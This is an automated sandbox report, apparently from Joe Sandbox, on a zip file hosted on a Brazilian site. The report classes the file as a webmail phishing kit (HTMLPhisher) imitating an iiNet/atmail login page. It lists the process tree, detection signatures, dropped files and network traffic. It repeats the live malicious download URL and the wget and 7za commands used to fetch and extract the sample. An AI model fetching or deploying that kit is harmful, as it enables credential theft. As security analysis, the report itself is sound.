Edit tour

Windows Analysis Report
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip

Overview

General Information

Sample URL:	https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip
Analysis ID:	1523880
Infos:

Detection

HTMLPhisher

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6824 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wget.exe (PID: 4180 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)

7za.exe (PID: 2108 cmdline: 7za x -y -pinfected -o"C:\Users\user\Desktop\extract" "C:\Users\user\Desktop\download\Webmail-iinet.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)

conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

unarchiver.exe (PID: 5084 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\download\Webmail-iinet.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)

7za.exe (PID: 1704 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)

conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\extract\Webmail-iinet\index.html	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5308, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1, ProcessId: 6824, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: C:\Users\user\Desktop\extract\Webmail-iinet\index.html, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html, type: DROPPED

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 191.37.38.39:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 191.37.38.39:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pop/Webmail-iinet.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: /Accept-Encoding: identityHost: maninhocontabilidade.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pop/Webmail-iinet.zip HTTP/1.1Range: bytes=151978-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: /Accept-Encoding: identityHost: maninhocontabilidade.com.brConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: maninhocontabilidade.com.br

Source: app-059cd76ea4a5433e14ff6151a432ee48.css.7.dr, app-059cd76ea4a5433e14ff6151a432ee48.css.3.dr	String found in binary or memory: http://codepen.io/mrrocks/pen/EiplA
Source: tmc-login.png.7.dr, tmc-login.png.3.dr, cb3cc3fa3480964080588c52478ae092-login.png.7.dr, cb3cc3fa3480964080588c52478ae092-login.png.3.dr	String found in binary or memory: http://ns.attribution.com/ads/1.0/
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, next.php.7.dr, next.php.3.dr	String found in binary or memory: http://www.geoiptool.com/?IP=$ip
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: cmdline.out.0.dr	String found in binary or memory: https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip
Source: wget.exe, 00000002.00000002.1697508368.0000000000170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://maninhocontabilidade.com.br/pop/Webmail-iinet.zipL=6PR
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: app-059cd76ea4a5433e14ff6151a432ee48.css.7.dr, app-059cd76ea4a5433e14ff6151a432ee48.css.3.dr	String found in binary or memory: https://stackoverflow.com/a/19758620
Source: app-059cd76ea4a5433e14ff6151a432ee48.css.7.dr, app-059cd76ea4a5433e14ff6151a432ee48.css.3.dr	String found in binary or memory: https://stackoverflow.com/a/9422689
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://static.atmail.com/TMC/whitebg.png")
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	String found in binary or memory: https://www.google.com
Source: 7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, email.php.7.dr, email.php.3.dr	String found in binary or memory: https://www.google.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 191.37.38.39:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 191.37.38.39:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: classification engine

Classification label: mal48.phis.win@10/18@2/1

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\cmdline.out

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03

Source: C:\Windows\SysWOW64\unarchiver.exe

File created: C:\Users\user\AppData\Local\Temp\unarchiver.log

Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip"
Source: unknown	Process created: C:\Windows\SysWOW64\7za.exe 7za x -y -pinfected -o"C:\Users\user\Desktop\extract" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
Source: C:\Windows\SysWOW64\7za.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
Source: C:\Windows\SysWOW64\7za.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip"	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\7za.exe	Section loaded: 7z.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\7za.exe	Section loaded: 7z.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 10E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Memory allocated: 4E80000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe TID: 4488

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\unarchiver.exe

Code function: 6_2_00D4B1D6 GetSystemInfo,

6_2_00D4B1D6

Source: C:\Windows\SysWOW64\unarchiver.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wget.exe, 00000002.00000002.1697651550.00000000009E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\unarchiver.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip"

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://maninhocontabilidade.com.br/pop/webmail-iinet.zip" > cmdline.out 2>&1

Source: C:\Windows\SysWOW64\wget.exe	Queries volume information: C:\Users\user\Desktop\download VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Queries volume information: C:\Users\user\Desktop\download VolumeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	32 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Virtualization/Sandbox Evasion	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
maninhocontabilidade.com.br	0%	Virustotal	Browse
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js	0%	URL Reputation	safe
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js	0%	URL Reputation	safe
https://code.jquery.com/jquery-3.2.1.slim.min.js	0%	URL Reputation	safe
http://ns.attribution.com/ads/1.0/	0%	URL Reputation	safe
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js	0%	URL Reputation	safe
https://www.google.com	0%	Virustotal		Browse
https://stackoverflow.com/a/19758620	0%	Virustotal		Browse
http://www.geoiptool.com/?IP=$ip	0%	Virustotal		Browse
https://www.google.com/	0%	Virustotal		Browse
http://codepen.io/mrrocks/pen/EiplA	0%	Virustotal		Browse
https://stackoverflow.com/a/9422689	0%	Virustotal		Browse
https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
maninhocontabilidade.com.br	191.37.38.39	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	false	0%, Virustotal, Browse	unknown
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://code.jquery.com/jquery-3.2.1.slim.min.js	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	false	URL Reputation: safe	unknown
https://stackoverflow.com/a/19758620	app-059cd76ea4a5433e14ff6151a432ee48.css.7.dr, app-059cd76ea4a5433e14ff6151a432ee48.css.3.dr	false	0%, Virustotal, Browse	unknown
http://www.geoiptool.com/?IP=$ip	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, next.php.7.dr, next.php.3.dr	false	0%, Virustotal, Browse	unknown
http://ns.attribution.com/ads/1.0/	tmc-login.png.7.dr, tmc-login.png.3.dr, cb3cc3fa3480964080588c52478ae092-login.png.7.dr, cb3cc3fa3480964080588c52478ae092-login.png.3.dr	false	URL Reputation: safe	unknown
https://static.atmail.com/TMC/whitebg.png")	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	false		unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	false	0%, Virustotal, Browse	unknown
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, index.html.3.dr, index.html.7.dr	false	URL Reputation: safe	unknown
http://codepen.io/mrrocks/pen/EiplA	app-059cd76ea4a5433e14ff6151a432ee48.css.7.dr, app-059cd76ea4a5433e14ff6151a432ee48.css.3.dr	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/a/9422689	app-059cd76ea4a5433e14ff6151a432ee48.css.7.dr, app-059cd76ea4a5433e14ff6151a432ee48.css.3.dr	false	0%, Virustotal, Browse	unknown
https://www.google.com/	7za.exe, 00000003.00000003.1699147428.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, 7za.exe, 00000007.00000003.1711958220.0000000001430000.00000004.00000800.00020000.00000000.sdmp, email.php.7.dr, email.php.3.dr	false	0%, Virustotal, Browse	unknown
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zipL=6PR	wget.exe, 00000002.00000002.1697508368.0000000000170000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
191.37.38.39	maninhocontabilidade.com.br	Brazil		263347	CEDNETPROVEDORINTERNETBR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523880
Start date and time:	2024-10-02 06:34:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	urldownload.jbs
Sample URL:	https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.phis.win@10/18@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 0
Cookbook Comments:	Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 52.165.164.15
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
